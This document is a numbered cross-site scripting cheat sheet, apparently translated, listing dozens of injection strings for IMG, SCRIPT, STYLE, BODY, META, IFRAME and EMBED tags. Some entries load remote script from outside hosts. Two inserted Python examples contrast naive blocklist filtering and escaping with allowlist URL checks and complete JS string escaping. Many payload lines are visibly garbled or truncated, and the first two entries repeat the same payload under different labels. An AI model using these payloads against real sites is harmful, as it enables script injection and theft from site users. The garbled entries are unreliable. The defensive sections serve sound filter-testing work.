(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Getting around a character limit (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters have basically no effect domestically, because there is nowhere they can be made use of.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
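Entries (3) through (17) all work against the same defensive mistake: a blocklist that looks for the literal string "javascript:" and is defeated by case changes, HTML entities, embedded tabs and newlines, or a NUL byte. The example below is added here, is not part of the original list, and shows the check a defender wants instead: decode the attribute value the way the browser will, then allowlist the scheme. The sample values and ALLOWED_SCHEMES are constructed for the example; the same check applies to every URL-bearing attribute this list exercises (SRC, HREF, BACKGROUND, DYNSRC, LOWSRC, META refresh, CSS url()).

```python
import html
import re

# Control characters and spaces that browsers skip when matching a URL scheme.
_STRIP_CTRL = re.compile(r"[\x00-\x20\x7f]")

# Schemes a user-supplied href/src may carry; everything else is rejected.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def naive_is_safe(url: str) -> bool:
    """Blocklist filter of the kind these entries bypass: it only rejects a
    literal, lowercase, unbroken 'javascript:' prefix."""
    return not url.startswith("javascript:")


def normalize_url(url: str) -> str:
    """Reduce the value to what the browser will interpret: decode HTML entities
    once (as the attribute parser does), then drop skipped control characters."""
    return _STRIP_CTRL.sub("", html.unescape(url))


def is_safe_url(url: str) -> bool:
    """Allowlist check on the normalized URL: either no scheme at all (a relative
    URL) or one that is explicitly permitted, compared case-insensitively."""
    m = re.match(r"([a-z][a-z0-9+.\-]*):", normalize_url(url), re.IGNORECASE)
    return m is None or m.group(1).lower() in ALLOWED_SCHEMES


# Constructed sample values in the spirit of entries (3)-(5), (11)-(14) and (17);
# tab, newline and NUL are written as Python escapes. True = should be allowed.
SAMPLES = {
    "javascript:alert('XSS')": False,                        # (3) plain
    "JaVaScRiPt:alert('XSS')": False,                        # (4) mixed case
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')": False,  # (5)
    "jav\tascript:alert('XSS')": False,                      # (11) embedded tab
    "jav&#x09;ascript:alert('XSS')": False,                  # (12) encoded tab
    "jav\nascript:alert('XSS')": False,                      # (13) newline
    "jav\rascript:alert('XSS')": False,                      # (14) carriage return
    "java\0script:alert('XSS')": False,                      # (17) NUL byte
    "https://example.com/app.js": True,                      # ordinary absolute URL
    "/images/logo.png": True,                                # relative URL
}


def evaluate() -> dict:
    """Map each sample to (naive verdict, allowlist verdict, expected verdict)."""
    return {u: (naive_is_safe(u), is_safe_url(u), ok) for u, ok in SAMPLES.items()}
```

Running evaluate() shows the naive filter passing every variant except the plain one, while the allowlist rejects all of them and still admits ordinary absolute and relative URLs.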
(19) IMG tag with spaces and meta characters
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering
\";alert('XSS');//
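Entry (29) succeeds because an application that escapes only the quote character leaves the attacker's own backslash in place, and that backslash then escapes the escape. The example below is added here and is not part of the original list: it contrasts that naive escaping with a complete JavaScript string literal, and uses a small scanner to show where the literal really ends. The `var name=...` template is an assumed context for the demonstration.

```python
import json

# Cheat-sheet entry (29), written as a Python literal: backslash, quote, then code.
PAYLOAD = '\\";alert(\'XSS\');//'


def naive_escape(value: str) -> str:
    """Escape only the double quote; the attacker's own backslash is left in place
    and ends up escaping the escape, so the quote becomes live again."""
    return value.replace('"', '\\"')


def js_string_literal(value: str) -> str:
    """Build a complete JS string literal: json.dumps escapes backslashes, quotes
    and control characters; '<', '>' and '&' are hex-escaped as well so the
    literal can never terminate an enclosing <script> block."""
    s = json.dumps(value)
    return s.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def naive_render(value: str) -> str:
    """Assumed template: the value is dropped between literal quotes."""
    return 'var name="' + naive_escape(value) + '";'


def safe_render(value: str) -> str:
    """Same assumed template, but the whole literal comes from js_string_literal."""
    return "var name=" + js_string_literal(value) + ";"


def literal_end(js: str, start: int) -> int:
    """Index just past the double-quoted literal opening at js[start], following
    the JS rule that a backslash consumes the next character; -1 if never closed."""
    i = start + 1
    while i < len(js):
        if js[i] == "\\":
            i += 2
        elif js[i] == '"':
            return i + 1
        else:
            i += 1
    return -1


def trailing_code(js: str) -> str:
    """Everything the JS parser sees after the literal: just the closing ';' for a
    safe rendering, attacker-controlled code for the naive one."""
    end = literal_end(js, js.index('"'))
    return js[end:] if end >= 0 else ""
```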
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>